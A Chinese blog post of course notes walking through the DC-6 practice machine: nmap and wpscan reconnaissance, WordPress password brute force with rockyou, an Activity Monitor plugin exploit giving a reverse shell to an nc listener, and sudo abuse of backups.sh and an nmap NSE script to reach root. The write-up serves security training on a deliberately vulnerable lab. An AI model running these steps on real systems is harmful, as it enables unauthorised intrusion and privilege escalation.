热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

[网络安全学习篇74]:渗透测试实战DC6靶机入侵

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

 

往期博客:

第一阶段:

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)

[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)

第二阶段:

[网络安全学习篇25]:初识Linux及简单命令

[网络安全学习篇32]:Linux脚本编写汇总及应用

第三阶段:

[网络安全学习篇33]:0基础带你入门python

[网络安全学习篇38]:基础环境搭建

[网络安全学习篇39]:HTML标签基础 常用的标签 表格

[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)

[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]:JS 基础 函数 事件)

第四阶段:

[网络安全学习篇49]:渗透测试方法论

[网络安全学习篇50]:Web架构安全分析

[网络安全学习篇51]:信息收集

[网络安全学习篇52]:扫描技术

[网络安全学习篇53]:口令**

[网络安全学习篇54]:SQL注入

[网络安全学习篇55]:SQL自动化注入

[网络安全学习篇56]:XSS

[网络安全学学习篇57]:XSS(二)

[网络安全学习篇58]:PHP代码注入

[网络安全学习篇59]:OS命令注入

[网络安全学习篇60]:文件上传

[网络安全学习篇61]:文件包含

[网络安全学习篇62]:CSRF 攻击

[网络安全学习篇63]:s-s-rF

[网络安全学习篇64]:业务安全

[千峰网络安全学习篇65]:提权

[网络安全学习篇66]:Metasploit(MSF)

[网络安全学习篇67]:python poc-exp

[网络安全学习篇68]:反序列化漏洞

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵

[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵(本篇)

下期博文:

[网络安全学习篇75]:渗透测试实战-DC-7-靶机入侵

 

目录

信息收集

获取IP及目标主机信息

添加本地DNS解析

使用wpscan 扫描

**

创建密码字典

创建用户名字典

反弹shell

提权

成功拿到flag


信息收集

获取IP及目标主机信息

nmap -sP 192.168.1.2/24 -oN nmap.sP

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

nmap -A 192.168.1.169 -p- -oN  nmap.A

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

添加本地DNS解析

vim /etc/hosts

192.168.1.169 wordy

 

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

使用wpscan 扫描

wpscan --url wordy -e u

扫出了网站的登录后台

http://wordy/wp-login.php

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

以及4个用户名

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

**

作者给出了**使用的密码字典的提示信息,

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

创建密码字典

cd /usr/share/wordlists

cp rockyou.txt.gz rockyou.txt.gz.bak

gunzip rockyou.txt.gz rockyou.txt

cp /usr/share/wordlists/rockyou.txt /root/dc-6/passwd.dic

 

创建用户名字典

vim user.dic

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

暴力**用户名密码

wpscan --url wordy -U user.dic -P passwd.dic

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

Username: mark, Password: helpdesk01

 

使用该账密,成功登录网站后台

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

反弹shell

查找activity monitor 插件是否存在漏洞

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

searchsploit activity monitor

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

存在远程执行漏洞可以反弹shell 到本地

cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html

 

修改该文件

vim 45274.html

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

python -m SimpleHTTPServer

当前目录下开启http 服务

 

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

本地开启nc 监听2333端口

nc -lvvp 2333

点击Submit request 连接

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

python -c 'import pty;pty.spawn("/bin/bash")'

反弹shell 成功,进入python 交互式

提权

进入到mark 的家目录下,在stuff 目录下发现things-to-do.txt 文件

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

得到graham 用户账密

 

sudo -l

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

可以发现 jens 用户在没有密码的情况下可以执行backups.sh 文件

我们在backups.sh 文件中添加/bin/bash 命令

echo "/bin/bash" >>backups.sh

 

sudo -u jens ./backups.sh

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

成功切换到jens 用户

 

sudo -l

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

发现nmap 命令可以在不需要root 用户密码密码的情况下使用

考虑使用nmap 脚本来提权

echo 'os.execute("/bin/sh")' > getShell.nse

sudo -u root nmap --script=getShell.nse

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

成功拿到flag

[网络安全学习篇74]:渗透测试实战-DC-6-靶机入侵

 

 


推荐阅读
  • MySQL日志分析在应急响应中的应用与优化策略
    在应急响应中,MySQL日志分析对于检测和应对数据库攻击具有重要意义。常见的攻击手段包括弱口令、SQL注入、权限提升和备份数据窃取。通过对MySQL日志的深入分析,不仅可以及时发现潜在的攻击行为,还能详细还原攻击过程并追踪攻击源头。此外,优化日志记录和分析策略,能够提高安全响应效率,增强系统的整体安全性。 ... [详细]
  • SQLmap自动化注入工具命令详解(第28-29天 实战演练)
    SQL注入工具如SQLMap等在网络安全测试中广泛应用。SQLMap是一款开源的自动化SQL注入工具,支持12种不同的数据库,具体支持的数据库类型可在其插件目录中查看。作为当前最强大的注入工具之一,SQLMap在实际应用中具有极高的效率和准确性。 ... [详细]
  • 6个常见的 PHP 安全性攻击实例和阻止方法_php实例
    这篇文章主要介绍了6个常见的PHP安全性攻击实例和阻止方法,有对这方面感兴趣的小伙伴 ... [详细]
  • 基于Node.js的高性能实时消息推送系统通过集成Socket.IO和Express框架,实现了高效的高并发消息转发功能。该系统能够支持大量用户同时在线,并确保消息的实时性和可靠性,适用于需要即时通信的应用场景。 ... [详细]
  • Ceph API微服务实现RBD块设备的高效创建与安全删除
    本文旨在实现Ceph块存储中RBD块设备的高效创建与安全删除功能。开发环境为CentOS 7,使用 IntelliJ IDEA 进行开发。首先介绍了 librbd 的基本概念及其在 Ceph 中的作用,随后详细描述了项目 Gradle 配置的优化过程,确保了开发环境的稳定性和兼容性。通过这一系列步骤,我们成功实现了 RBD 块设备的快速创建与安全删除,提升了系统的整体性能和可靠性。 ... [详细]
  • 深入解析Wget CVE-2016-4971漏洞的利用方法与安全防范措施
    ### 摘要Wget 是一个广泛使用的命令行工具,用于从 Web 服务器下载文件。CVE-2016-4971 漏洞涉及 Wget 在处理特定 HTTP 响应头时的缺陷,可能导致远程代码执行。本文详细分析了该漏洞的成因、利用方法以及相应的安全防范措施,包括更新 Wget 版本、配置防火墙规则和使用安全的 HTTP 头。通过这些措施,可以有效防止潜在的安全威胁。 ... [详细]
  • PyQt5 QTextEdit:深入解析Python中多功能GUI库的应用与实现
    本文详细探讨了 PyQt5 中 QTextEdit 组件在 Python 多功能 GUI 库中的应用与实现。PyQt5 是 Qt 框架的 Python 绑定,提供了超过 620 个类和 6000 个函数及方法,广泛应用于跨平台应用程序开发。QTextEdit 作为其中的重要组件,支持丰富的文本编辑功能,如富文本格式、文本高亮和自定义样式等。PyQt5 的流行性不仅在于其强大的功能,还在于其易用性和灵活性,使其成为开发复杂用户界面的理想选择。 ... [详细]
  • Linux学习精华:程序管理、终端种类与命令帮助获取方法综述 ... [详细]
  • 内网渗透技术详解:PTH、PTT与PTK在域控环境中的应用及猫盘内网穿透配置
    本文深入探讨了内网渗透技术,特别是PTH、PTT与PTK在域控环境中的应用,并详细介绍了猫盘内网穿透的配置方法。通过这些技术,安全研究人员可以更有效地进行内网渗透测试,解决常见的渗透测试难题。此外,文章还提供了实用的配置示例和操作步骤,帮助读者更好地理解和应用这些技术。 ... [详细]
  • PHP中元素的计量单位是什么? ... [详细]
  • 本文对比分析了三种基于Java的推理引擎:Jess、Racer和Jena。Jess(Java Expert Shell System)源自CLIPS,后者是一种经典的基于规则的前向推理引擎。Racer则专注于本体和语义推理,支持OWL和SWRL等标准。Jena是一个强大的语义网框架,不仅支持RDF和SPARQL查询,还具备推理能力。通过性能测试和功能对比,本文探讨了它们在不同应用场景下的优劣。 ... [详细]
  • Spring 中获取 Request 的多种方式及其线程安全性的深入解析
    本文深入探讨了在Spring MVC框架下获取HTTP请求对象的多种方法,详细分析了每种方法的实现原理及其线程安全性,为开发者提供了全面的技术参考。 ... [详细]
  • 本文目录一览:1、请写出php变量序列化和反序列化的函数,并举出1个应用例子 ... [详细]
  • 洞见RSAC|点击获取企业安全策略“工具包”
    为用户提供安全智 ... [详细]
  • 一般的网页我的项目能够很容易的实现换肤性能,能够通过js扭转link元素中引入的css主题款式链接。然而微信小程序不能动静扭转wxss文件,所以须要其余的计划来实现。 ... [详细]
author-avatar
十字彩虹00
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有